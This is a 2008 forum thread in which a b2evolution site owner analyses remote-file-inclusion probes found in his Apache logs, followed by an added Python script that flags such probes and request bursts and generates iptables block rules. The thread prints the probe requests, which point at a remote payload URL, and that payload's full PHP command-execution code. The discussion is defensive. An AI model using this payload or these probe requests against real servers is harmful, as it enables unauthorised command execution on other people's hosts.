
1 Aug 24, 2008 13:49    

My b2evolution Version: 2.x

Below are the records (separated by blank lines) of one of 3 IP addresses that Apache/Debian logged on August 23, 2008. I would appreciate any insight. Thank you.

65.98.70.18 - - [23/Aug/2008:13:04:29 -0700] "GET /blog/index.php/2008/06/02/os-2-w...-business-wseb-and?blog=4/index.php?_SERVER[DOCUMENT_ROOT]=http://www.topyn.com/ips.txt?? HTTP/1.1" 400 567 "-" "libwww-perl/5.811"

65.98.70.18 - - [23/Aug/2008:13:04:29 -0700] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://www.topyn.com/ips.txt?? HTTP/1.1" 200 46203 "-" "libwww-perl/5.811"

65.98.70.18 - - [23/Aug/2008:13:04:31 -0700] "GET /blog/index.php/2008/06/02/index.php?_SERVER[DOCUMENT_ROOT]=http://www.topyn.com/ips.txt?? HTTP/1.1" 200 - "-" "libwww-perl/5.811"

Digging further, one realizes that http://www.topyn.com/ips.txt is actually a PHP file (hosted at a porn site, as can be verified), whose content I list below (I used the wget utility to obtain it):
--------------------------------------------
<?php
// Marker string: the scanner looks for it in the response to tell
// whether the remote file was actually included and executed.
echo "Mic22";
$cmd = "id";
$eseguicmd = ex($cmd);
echo $eseguicmd;

// Run a shell command through whichever execution function the host
// has not disabled, trying exec, shell_exec, system, passthru, popen.
function ex($cfe) {
    $res = '';
    if (!empty($cfe)) {
        if (function_exists('exec')) {
            @exec($cfe, $res);
            $res = join("\n", $res);
        } elseif (function_exists('shell_exec')) {
            $res = @shell_exec($cfe);
        } elseif (function_exists('system')) {
            @ob_start();
            @system($cfe);
            $res = @ob_get_contents();
            @ob_end_clean();
        } elseif (function_exists('passthru')) {
            @ob_start();
            @passthru($cfe);
            $res = @ob_get_contents();
            @ob_end_clean();
        } elseif (@is_resource($f = @popen($cfe, "r"))) {
            $res = "";
            while (!@feof($f)) {
                $res .= @fread($f, 1024);
            }
            @pclose($f);
        }
    }
    return $res;
}
exit;
-------------------------------------------------

2 Aug 24, 2008 14:03

Block the IP 65.98.70.18 in your .htaccess file. Please search Google on how to do that.
I don't believe anything actually happened. They tried to redirect your site. B2evolution is well protected against attacks like these.

Good luck

3 Aug 24, 2008 14:18

Afwas,

I appreciate your kind response/advice. In effect I blocked that offending IP address (and 2 others) using iptables. Additionally, I notified the pertinent hosting providers about these crackers.

Below is the corresponding log entry in the Apache error.log file (for informational purposes):

[Sat Aug 23 13:04:31 2008] [error] [client 65.98.70.18] PHP Fatal error: Call to undefined function bad_request_die() in [snip]/blog/inc/_main.inc.php on line 89

4 Aug 25, 2008 09:37

We get thousands of hits from skiddies like that ;)

¥

5 Oct 17, 2008 06:22

¥åßßå wrote:

We get thousands of hits from skiddies like that ;)

¥

Thank you for reinforcing the notion that b2evolution can withstand these attacks. On the other hand, I would be interested in knowing what you do about the incessant poking of your site(s) by these skiddies, ¥åßßå.

I have noticed that these international malicious short interval hits (among others) against my site(s) have increased, and the list of blocked IPs is increasing in my servers' iptables as a direct response to the problem.

How do you handle the annoyance and bandwidth resource misuse by these s(cript)kiddies, as well as site/blog scrapers that drill into your site/blog for several minutes, taking your site/blog content with them? I have had a couple of IPs during the last month that have done the latter: 82.80.249.147 and 82.80.249.143

Regards.
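The two things this thread asks for, recognising the probe in the first post and dealing with short-interval hammering in the last one, can both be automated from the access log. The script below is an added example for this thread, not code from b2evolution or from any of the posters. It parses Apache combined-format lines, flags the two hallmarks of the probe shown above (a query string that tries to set a PHP superglobal such as _SERVER[...], which only works on hosts with register_globals on, and a parameter whose value is a remote URL), flags the libwww-perl user agent, finds IPs that exceed a hit-rate threshold in a sliding window (the scraper case), and renders the iptables DROP rules the original poster applied by hand. The three probe lines are the ones quoted in the first post; the benign hit, the scraper burst (documentation addresses 198.51.100.7 and 203.0.113.9), the threshold of 10 hits per 60 seconds and the indicator names are all assumptions made for the example.

```python
"""Triage Apache combined-format log lines for remote-file-inclusion (RFI)
probes and short-interval request bursts, and emit iptables block rules.

Added example for this thread; not code from b2evolution or from any poster.
Thresholds, indicator names and the benign/scraper lines are assumptions.
"""
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import unquote

# Constructed sample input. The first three lines are the requests quoted in
# the opening post; the benign hit (198.51.100.7) and the scraper burst
# (203.0.113.9) use documentation addresses and are invented for the example.
RFI_PROBES = [
    '65.98.70.18 - - [23/Aug/2008:13:04:29 -0700] "GET /blog/index.php/2008/06/02/os-2-w...-business-wseb-and?blog=4/index.php?_SERVER[DOCUMENT_ROOT]=http://www.topyn.com/ips.txt?? HTTP/1.1" 400 567 "-" "libwww-perl/5.811"',
    '65.98.70.18 - - [23/Aug/2008:13:04:29 -0700] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://www.topyn.com/ips.txt?? HTTP/1.1" 200 46203 "-" "libwww-perl/5.811"',
    '65.98.70.18 - - [23/Aug/2008:13:04:31 -0700] "GET /blog/index.php/2008/06/02/index.php?_SERVER[DOCUMENT_ROOT]=http://www.topyn.com/ips.txt?? HTTP/1.1" 200 - "-" "libwww-perl/5.811"',
]
BENIGN_HIT = '198.51.100.7 - - [23/Aug/2008:13:10:02 -0700] "GET /blog/index.php?blog=4 HTTP/1.1" 200 18422 "http://example.net/" "Mozilla/5.0"'
SCRAPER_BURST = [  # 15 page fetches in 28 seconds (constructed)
    f'203.0.113.9 - - [23/Aug/2008:14:00:{s:02d} -0700] "GET /blog/index.php/2008/06/{s + 1:02d}/post-{s} HTTP/1.1" 200 15000 "-" "Mozilla/4.0"'
    for s in range(0, 30, 2)
]
SAMPLE_LOG = "\n".join(RFI_PROBES + [BENIGN_HIT] + SCRAPER_BURST)

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# A query string that tries to set a PHP superglobal (only effective with
# register_globals on) and a parameter whose value is a remote URL are the
# two hallmarks of the probe quoted in the thread.
SUPERGLOBAL_RE = re.compile(
    r'[?&;](?:_SERVER|_GET|_POST|_COOKIE|_REQUEST|_ENV|_FILES|GLOBALS)\[', re.I)
REMOTE_URL_RE = re.compile(r'=(?:https?|ftp)://', re.I)
SCANNER_UA_MARKERS = ('libwww-perl',)  # assumption: tooling UA seen in the thread


def parse_line(line):
    """Return a dict for one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    e = m.groupdict()
    e['when'] = datetime.strptime(e['ts'], '%d/%b/%Y:%H:%M:%S %z')
    e['status'] = int(e['status'])
    # Decode %-escapes so an encoded "%5FSERVER%5B" does not slip past the regex.
    e['decoded'] = unquote(e['target'])
    return e


def rfi_indicators(entry):
    """List the RFI indicators present in a parsed entry (empty list = clean)."""
    hits = []
    if SUPERGLOBAL_RE.search(entry['decoded']):
        hits.append('superglobal-override')
    if REMOTE_URL_RE.search(entry['decoded']):
        hits.append('remote-url-parameter')
    if any(marker in entry['ua'] for marker in SCANNER_UA_MARKERS):
        hits.append('scanner-user-agent')
    return hits


def burst_offenders(entries, max_hits=10, window_seconds=60):
    """IPs that made at least max_hits requests inside any window_seconds span."""
    by_ip = defaultdict(list)
    for e in entries:
        by_ip[e['ip']].append(e['when'])
    offenders = set()
    for ip, times in by_ip.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):  # sliding window over sorted timestamps
            while (t - times[start]).total_seconds() > window_seconds:
                start += 1
            if end - start + 1 >= max_hits:
                offenders.add(ip)
                break
    return offenders


def analyze(log_text, max_hits=10, window_seconds=60):
    """Triage a log excerpt: RFI indicators per IP, burst IPs, and the union to block."""
    entries = [e for e in map(parse_line, log_text.splitlines()) if e]
    rfi = defaultdict(set)
    for e in entries:
        for indicator in rfi_indicators(e):
            rfi[e['ip']].add(indicator)
    bursts = burst_offenders(entries, max_hits, window_seconds)
    return {'rfi': dict(rfi), 'bursts': bursts, 'block': set(rfi) | bursts}


def iptables_rules(ips):
    """Render one DROP rule per IP, the same thing the poster did by hand."""
    return [f'iptables -I INPUT -s {ip} -j DROP' for ip in sorted(ips)]


if __name__ == '__main__':
    result = analyze(SAMPLE_LOG)
    for ip, reasons in sorted(result['rfi'].items()):
        print(f'{ip}: RFI probe ({", ".join(sorted(reasons))})')
    for ip in sorted(result['bursts']):
        print(f'{ip}: request burst')
    print('\n'.join(iptables_rules(result['block'])))
```

Two practical notes. The status code is deliberately not used as an indicator: the second probe above returned 200 with a full page body, and whether the include actually executed is only visible in the response (the payload echoes "Mic22" and the output of `id`), not in the access log, so a 200 on its own proves nothing either way. And a burst threshold tuned for scrapers will also catch legitimate crawlers; whitelist those by user agent or reverse DNS before feeding the block list to iptables.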

